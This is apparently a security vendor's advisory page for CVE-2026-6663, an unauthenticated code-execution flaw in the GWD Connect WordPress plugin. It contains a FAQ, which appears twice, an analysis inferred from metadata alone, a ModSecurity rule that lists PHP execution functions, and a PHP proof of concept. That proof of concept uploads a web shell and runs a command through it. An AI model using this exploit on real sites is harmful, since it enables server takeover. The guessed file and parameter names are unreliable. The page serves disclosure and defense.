What is CVE-2026-6663?

CVE-2026-6663 is a medium severity vulnerability in the GWD Connect plugin for WordPress, affecting versions up to and including 2.9. It allows unauthenticated attackers to execute limited code on unregistered installations due to missing authorization checks in specific plugin endpoints.

How does the vulnerability work?

The vulnerability arises from the gwd-backup.php and gwd-logs.php endpoints not verifying if an API key is configured, which is not set by default. Attackers can send requests to these endpoints with malicious code, which the plugin then writes to the server, enabling code execution.

Who is affected by this vulnerability?

WordPress installations using the GWD Connect plugin version 2.9 or earlier without an API key configured are at risk. Administrators should check their plugin version and configuration to determine if they are affected.

How can I check if my site is vulnerable?

To check for vulnerability, verify that you are using GWD Connect version 2.9 or earlier and confirm that no API key is configured. If both conditions are met, your site is vulnerable to CVE-2026-6663.

What are the potential risks of this vulnerability?

The main risk is limited code execution on the server, which could lead to a full site compromise, unauthorized access to data, or use of the server for further attacks. The CVSS score of 4.8 indicates a medium risk level.

How can I mitigate this vulnerability?

To mitigate the vulnerability, administrators should either uninstall the GWD Connect plugin or ensure that an API key is configured with a strong value. Additionally, access to the vulnerable endpoints can be restricted using server-level rules.

What does the CVSS score of 4.8 mean?

A CVSS score of 4.8 indicates a medium severity vulnerability, suggesting that while the risk is not critical, it is significant enough to warrant prompt attention and remediation to prevent potential exploitation.

What are the specific endpoints affected?

The specific endpoints affected by CVE-2026-6663 are gwd-backup.php and gwd-logs.php located in the GWD Connect plugin directory. These files are where the unauthorized code execution can occur.

What is the proof of concept for this vulnerability?

The proof of concept demonstrates how an attacker can send a crafted HTTP request to the vulnerable endpoints to inject PHP code. This code is then written to the server, allowing the attacker to execute it by accessing the agent file directly.

Is there a patch available for this vulnerability?

As of now, there is no patched version of the GWD Connect plugin available. Administrators must take alternative measures to secure their installations until an official fix is released.

What should I do if I cannot uninstall the plugin?

If uninstalling the plugin is not an option, ensure that the API key is set to a strong, non-guessable value and restrict access to the vulnerable endpoints using .htaccess or server-level rules to prevent unauthorized access.

How can I stay informed about vulnerabilities like this?

To stay informed about vulnerabilities, subscribe to security mailing lists, follow security blogs, and regularly check the National Vulnerability Database (NVD) or CVE databases for updates related to WordPress plugins.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 11, 2026

CVE-2026-6663: GWD Connect <= 2.9 – Unauthenticated Limited Code Execution via update_agent (graphic-web-design-inc)

CVE ID CVE-2026-6663

Plugin graphic-web-design-inc

Severity Medium (CVSS 4.8)

CWE 862

Vulnerable Version 2.9

Patched Version —

Disclosed May 10, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-6663 (metadata-based): This vulnerability in the GWD Connect plugin (graphic-web-design-inc) allows unauthenticated attackers to achieve limited code execution on unregistered installations when the API key is not configured (default state). The CVSS score is 4.8 (Medium) with a vector of AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N, indicating network-based exploitation with high attack complexity.

The root cause is a missing authorization check (CWE-862) in the plugin’s standalone agent endpoints, specifically gwd-backup.php and gwd-logs.php. These endpoints expose functionality for updating the agent file via the ‘update_agent’ action. The plugin fails to verify whether an API key has been configured or whether the requesting user is authenticated. Since the API key is not set by default, the authorization gate is effectively absent, leaving the endpoints open to anyone who can reach the files on a non-registered installation. This analysis is inferred from the CWE classification and vulnerability description; no source code was available for confirmation.

Exploitation requires an unregistered WordPress installation running the vulnerable plugin with no API key configured. The attacker sends a direct HTTP request to either /wp-content/plugins/graphic-web-design-inc/gwd-backup.php or /wp-content/plugins/graphic-web-design-inc/gwd-logs.php with an ‘action=update_agent’ parameter, along with a ‘code’ or ‘file_content’ parameter containing attacker-supplied PHP code. The vulnerable endpoint writes this code into the agent file (likely agent.php or similar) on the server. The attacker then executes the injected code by requesting the agent file directly.

Remediation requires adding proper authorization checks to both gwd-backup.php and gwd-logs.php. The fix should validate that a valid API key has been configured before processing any actions, especially update_agent. It should also verify the requesting user’s authentication status. Since no patched version is available, site administrators should either uninstall the plugin, restrict access to these files via .htaccess or server-level rules, or ensure the API key is set to a strong, non-guessable value.

The impact includes limited code execution on the server. An unauthenticated attacker can write arbitrary PHP code to disk, enabling remote code execution. This could lead to full site compromise, data exfiltration, or use of the server for further attacks. The CVSS confidentiality and integrity impact scores are Low, likely because exploitation depends on specific environmental conditions (unregistered installation, no API key configured).

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-6663 (metadata-based)
# Block unauthenticated access to GWD Connect agent update endpoints
# The vulnerability allows writing PHP code via update_agent action
# Match both gwd-backup.php and gwd-logs.php with update_agent parameter

SecRule REQUEST_URI "@rx /wp-content/plugins/graphic-web-design-inc/(gwd-backup|gwd-logs).php$" 
  "id:20266631,phase:2,deny,status:403,chain,msg:'CVE-2026-6663 GWD Connect Unauthenticated Code Execution',severity:'CRITICAL',tag:'CVE-2026-6663'"
  SecRule ARGS_POST:action "@streq update_agent" "chain"
    SecRule ARGS_POST:code "@rx b(?:system|exec|shell_exec|passthru|popen|proc_open|eval|assert|base64_decode|gzuncompress|file_put_contents|fwrite|fputs)b" 
      "t:none,t:urlDecode"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-6663 - GWD Connect <= 2.9 - Unauthenticated Limited Code Execution via update_agent

// Configuration - change these values
$target_url = 'http://example.com'; // Base URL of the WordPress installation
$plugin_path = '/wp-content/plugins/graphic-web-design-inc'; // Plugin directory path

// The malicious PHP code to inject (e.g., a simple web shell)
$php_payload = '<?php system($_GET["cmd"]); ?>';

// Two known vulnerable endpoints from the description
$endpoints = array(
    $target_url . $plugin_path . '/gwd-backup.php',
    $target_url . $plugin_path . '/gwd-logs.php'
);

$success = false;

// Try each endpoint
foreach ($endpoints as $endpoint) {
    echo "[+] Attempting endpoint: $endpointn";

    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $endpoint);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array(
        'action' => 'update_agent',
        'code' => $php_payload
    )));
    curl_setopt($ch, CURLOPT_HTTPHEADER, array(
        'Content-Type: application/x-www-form-urlencoded'
    ));
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);

    $response = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);

    // Check if the request was successful (HTTP 200) and response indicates success
    if ($http_code == 200 && $response !== false) {
        echo "[+] Endpoint responded with HTTP 200n";
        // Try to verify by accessing the agent file
        $agent_url = $target_url . $plugin_path . '/agent.php'; // Common agent file name
        $check_ch = curl_init();
        curl_setopt($check_ch, CURLOPT_URL, $agent_url . '?cmd=id');
        curl_setopt($check_ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($check_ch, CURLOPT_TIMEOUT, 10);
        $check_response = curl_exec($check_ch);
        $check_http = curl_getinfo($check_ch, CURLINFO_HTTP_CODE);
        curl_close($check_ch);

        if ($check_http == 200 && !empty($check_response)) {
            echo "[+] Exploit successful! Agent file returned: $check_responsen";
            $success = true;
            break;
        } else {
            echo "[!] Endpoint responded but could not verify code execution. The agent file may have a different name or path.n";
        }
    } else {
        echo "[!] Endpoint failed with HTTP $http_coden";
    }
}

if (!$success) {
    echo "[!] Exploit failed. The target may not be vulnerable (API key configured, plugin patched, or not unregistered).n";
    echo "[!] Alternative: Try different parameter names like 'file_content' or 'agent_code'.n";
}

Frequently Asked Questions

What is CVE-2026-6663?
Overview of the vulnerability
CVE-2026-6663 is a medium severity vulnerability in the GWD Connect plugin for WordPress, affecting versions up to and including 2.9. It allows unauthenticated attackers to execute limited code on unregistered installations due to missing authorization checks in specific plugin endpoints.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from the gwd-backup.php and gwd-logs.php endpoints not verifying if an API key is configured, which is not set by default. Attackers can send requests to these endpoints with malicious code, which the plugin then writes to the server, enabling code execution.
Who is affected by this vulnerability?
Identifying vulnerable installations
WordPress installations using the GWD Connect plugin version 2.9 or earlier without an API key configured are at risk. Administrators should check their plugin version and configuration to determine if they are affected.
How can I check if my site is vulnerable?
Steps to verify vulnerability
To check for vulnerability, verify that you are using GWD Connect version 2.9 or earlier and confirm that no API key is configured. If both conditions are met, your site is vulnerable to CVE-2026-6663.
What are the potential risks of this vulnerability?
Impact on site security
The main risk is limited code execution on the server, which could lead to a full site compromise, unauthorized access to data, or use of the server for further attacks. The CVSS score of 4.8 indicates a medium risk level.
How can I mitigate this vulnerability?
Recommended actions for administrators
To mitigate the vulnerability, administrators should either uninstall the GWD Connect plugin or ensure that an API key is configured with a strong value. Additionally, access to the vulnerable endpoints can be restricted using server-level rules.
What does the CVSS score of 4.8 mean?
Understanding the severity rating
A CVSS score of 4.8 indicates a medium severity vulnerability, suggesting that while the risk is not critical, it is significant enough to warrant prompt attention and remediation to prevent potential exploitation.
What are the specific endpoints affected?
Identifying vulnerable files
The specific endpoints affected by CVE-2026-6663 are gwd-backup.php and gwd-logs.php located in the GWD Connect plugin directory. These files are where the unauthorized code execution can occur.
What is the proof of concept for this vulnerability?
Demonstration of exploitation
The proof of concept demonstrates how an attacker can send a crafted HTTP request to the vulnerable endpoints to inject PHP code. This code is then written to the server, allowing the attacker to execute it by accessing the agent file directly.
Is there a patch available for this vulnerability?
Current status of remediation
As of now, there is no patched version of the GWD Connect plugin available. Administrators must take alternative measures to secure their installations until an official fix is released.
What should I do if I cannot uninstall the plugin?
Alternative security measures
If uninstalling the plugin is not an option, ensure that the API key is set to a strong, non-guessable value and restrict access to the vulnerable endpoints using .htaccess or server-level rules to prevent unauthorized access.
How can I stay informed about vulnerabilities like this?
Keeping up with security updates
To stay informed about vulnerabilities, subscribe to security mailing lists, follow security blogs, and regularly check the National Vulnerability Database (NVD) or CVE databases for updates related to WordPress plugins.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations